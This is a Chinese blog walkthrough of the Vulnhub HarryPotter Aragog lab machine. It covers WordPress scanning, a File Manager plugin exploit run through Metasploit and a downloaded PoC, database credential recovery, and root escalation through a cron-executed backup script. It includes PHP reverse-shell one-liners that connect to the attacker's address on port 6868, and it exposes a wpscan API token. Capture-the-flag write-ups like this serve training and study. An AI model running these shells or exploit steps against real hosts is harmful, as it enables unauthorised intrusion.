Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1

过期的秋刀鱼-2023-09-10 9:10

文章目录

靶机文档:HarryPotter: Aragog (1.0.2)

下载地址:Download (Mirror)

方式一

信息收集

主机发现

bash 复制代码 
 sudo arp-scan -l

端口扫描

目录扫描

看到这里扫出来目录中,index.htmljavascript , server-status ,blog 下的部分目录,并且出现了wp-login.php ,这也说明了这是一个wordpress的cms框架

index.html

blog

网页没有样式

查看网页源码

做域名ip映射 /etc/hosts

域名:wordpress.aragog.hogwarts IP:自己要访问靶机的机器的IP地址

发现是 WordPress 系统,用 wpscan 扫一下,加上api-token 扫:

wpscan工具

WPScan是一个扫描WordPress漏洞的扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

bash 复制代码 
wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive

可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的

漏洞利用

msf工具

bash 复制代码 
msf6 > search wordpress file manager
bash 复制代码 
use 1
info

查看需要配置的信息

需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip

hagrid98家目录下得到一串base64格式加密的数据

使用BurpSuiteDecoder功能解码

数据库权限

找一下数据库的用户名密码,查看数据库中有没有可利用信息

在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码,可以用于登录数据库

登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell 变成了交互式shell),输入下面命令即可拿到tty shell

使用得到用户名root,密码mySecr3tPass,来连接数据库

wordpress数据库保存的用户名和密码一般都放在wp_users表里面的

在线解密网站

用户名:hagrid98,密码:password123

用户权限

尝试SSH远程连接

root提权

使用sudo suid查询后发现没有可利用的

然后查找备份文件,查看有没有.sh结尾的文件

bash 复制代码 
find / -name '*.sh'

推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行

在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

php 复制代码 
<?php $sock=fsockopen("192.168.80.141 ",6868);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

/usr/bin/php是php的执行文件的目录,这样才能执行php文件

其实也可以直接在.backup.sh里面直接写一个反弹shell

kali监听6868端口

拿到root后可以使用crontab -l,查看当前用户的计划任务列表

方式二

信息收集

gobuster扫描

bash 复制代码 
└─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

wpscan扫描

bash 复制代码 
wpscan --api-token=xxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive

漏洞利用

POC

访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地

查看脚本的使用方法

生成反弹 shell写入到payload.php文件里

php 复制代码 
php -r '$sock=fsockopen("192.168.80.141",6868);exec("/bin/sh -i <&3 >&3 2>&3");'

运行脚本,得到反弹shell地址

地址中多写了一个/blog,删除即可

等一会就反弹到了

相关推荐
漏洞谷2 天前
白帽子为什么几乎都绕不开 httpx:一款 HTTP 资产探测工具的技术价值
web安全·漏洞挖掘·安全工具
用户962377954485 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主6 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954488 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机8 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机8 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954488 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star8 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954488 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher10 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03本地部署 OpenClaw + DeepSeek-R1 完全指南04OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录05OpenClaw 飞书机器人不回复消息?3 小时踩坑总结06Window 10部署openclaw报错node.exe : npm error code 12807OpenClaw 接入 QQ Bot 完整实践指南08OpenClaw macOS 完整安装与本地模型配置教程(实战版)09npm-error code 128问题解决方法10Vue-skills的中文文档